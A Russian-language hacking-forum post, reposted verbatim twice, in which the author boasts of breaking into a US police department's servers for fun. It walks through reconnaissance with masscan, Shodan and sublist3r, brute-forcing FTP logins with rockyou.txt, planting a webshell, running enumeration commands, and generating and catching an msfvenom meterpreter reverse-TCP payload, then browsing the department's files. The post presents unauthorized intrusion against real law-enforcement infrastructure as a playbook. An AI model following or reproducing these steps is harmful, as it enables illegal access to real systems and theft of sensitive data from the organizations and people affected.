DiNo
New member
Статья не моя. Все повествование пойдет от первого лица автора истории, по возможности постараюсь дополнить материал полезной инфой, для лучшего понимания.
Кидайте + если понравилось
Приветствую, мой дорогой читатель. В этой части я хочу рассказать тебе историю которая была проделана за один присест и затяг сигаретки. Пару дней ломал голову и сегодня решил всё таки изучить правда ли всё так плохо в плане ИБ в USA а именно в критических узлах..
Сегодня мы будет говорить о том как можно получить доступ к серверам и к локальной сетке целого ментовского департамента, лично мне было интересно изучать и потратить день на конечный результат и получить свою дозу андреналина и эндорфина.
Сразу отступаясь от начала хочу сказать одно. Не были зашифрованы или как то атакованы другие узлы сети копов.
Последние волосы с головы были сорваны, самовар заварен, пепельница помыта, носок натянут и началась работа по сбору информации:
1. информации о департаментах полиций во всех штатах;
2. был натравлен masscan на интересные подсети;
3. была выгружена вся возможная информация с боевого товарища Shodan ^ Fofa ^ Censys
Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет.
4. были проенумерованы все возможные домены : sublist3r в помощь + словари для брута под доменов
5. были пробручены пассы сервисов на великий Rockyou.txt
К вечеру мой cherrytree был полон информации для анализа и дальнейшего мозгового штурма. Кто не знает что такое
CherryTree — это приложение предназначенное для записи коротких заметок и мыслей.
Томми ловит 3 звезды : копы преследуют нас
Скажу сразу, не стал до конца изучать и копать весь материал... Потому что на момент брута FTP сервиса на нужных IP, был получен ACCESS GRANTED на несколько штук. В основном старые файлы и дистрибутивы ПО 200x годов.
Но один из них нас и порадовал.
Были проверены права на запись и чтение, о Боги права на запись были, наш CherryTree тихо шепчет нам о том что на данном IP по ssl имеется веб морда..
Незамедлительно был залитWebShell, но он не сработал отдав ошибкуApplication Error.. была стянута пачка шеллов и один из них всё таки работал стабильно.
WHOAMI ?nt authority etwork service
Проверяем в домене ли сервак?wmic computersystem get domain
Посмотрим учетные записи ?net users
msfvenom наш товарищ, твой выход! генерим простой .exe и забираем сессию, так как мы не преследуем цели коммерческого обогащения а лишь интереса ради делаем все агрессивно!!!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ИП LPORT=порт -f exe > meterpreter.exe
кладем файлик в C: emp
Ловим долгожданную сессию meterpreter и изучаем хост. Например ?
Томми ловит 6 звезд : копы на танках...
Погуляем по папкам и файлам. Но креды, ФИО и другие данные не будут показываться в целях безопасности 5-й точки.
Моя мысль? Всё можно найти и поломать...
Главное терпение и немного удачи в нужное время.
Не стал дальше пробивать машины в локалке
Не стал повышаться в правах до админа или системы
Не стал захватывать АД..
Хотя всё это смог бы сделать, остановило лишь одно. я сделал то чего хотел изначально )
Кидайте + если понравилось
Приветствую, мой дорогой читатель. В этой части я хочу рассказать тебе историю которая была проделана за один присест и затяг сигаретки. Пару дней ломал голову и сегодня решил всё таки изучить правда ли всё так плохо в плане ИБ в USA а именно в критических узлах..
Сегодня мы будет говорить о том как можно получить доступ к серверам и к локальной сетке целого ментовского департамента, лично мне было интересно изучать и потратить день на конечный результат и получить свою дозу андреналина и эндорфина.
Сразу отступаясь от начала хочу сказать одно. Не были зашифрованы или как то атакованы другие узлы сети копов.
Последние волосы с головы были сорваны, самовар заварен, пепельница помыта, носок натянут и началась работа по сбору информации:
1. информации о департаментах полиций во всех штатах;
2. был натравлен masscan на интересные подсети;
3. была выгружена вся возможная информация с боевого товарища Shodan ^ Fofa ^ Censys
Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет.
4. были проенумерованы все возможные домены : sublist3r в помощь + словари для брута под доменов
5. были пробручены пассы сервисов на великий Rockyou.txt
К вечеру мой cherrytree был полон информации для анализа и дальнейшего мозгового штурма. Кто не знает что такое
CherryTree — это приложение предназначенное для записи коротких заметок и мыслей.
Томми ловит 3 звезды : копы преследуют нас
Скажу сразу, не стал до конца изучать и копать весь материал... Потому что на момент брута FTP сервиса на нужных IP, был получен ACCESS GRANTED на несколько штук. В основном старые файлы и дистрибутивы ПО 200x годов.
Но один из них нас и порадовал.
Были проверены права на запись и чтение, о Боги права на запись были, наш CherryTree тихо шепчет нам о том что на данном IP по ssl имеется веб морда..
Незамедлительно был залитWebShell, но он не сработал отдав ошибкуApplication Error.. была стянута пачка шеллов и один из них всё таки работал стабильно.
WHOAMI ?nt authority etwork service
Проверяем в домене ли сервак?wmic computersystem get domain
Посмотрим учетные записи ?net users
msfvenom наш товарищ, твой выход! генерим простой .exe и забираем сессию, так как мы не преследуем цели коммерческого обогащения а лишь интереса ради делаем все агрессивно!!!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ИП LPORT=порт -f exe > meterpreter.exe
кладем файлик в C: emp
Ловим долгожданную сессию meterpreter и изучаем хост. Например ?
Томми ловит 6 звезд : копы на танках...
Погуляем по папкам и файлам. Но креды, ФИО и другие данные не будут показываться в целях безопасности 5-й точки.
Моя мысль? Всё можно найти и поломать...
Главное терпение и немного удачи в нужное время.
Не стал дальше пробивать машины в локалке
Не стал повышаться в правах до админа или системы
Не стал захватывать АД..
Хотя всё это смог бы сделать, остановило лишь одно. я сделал то чего хотел изначально )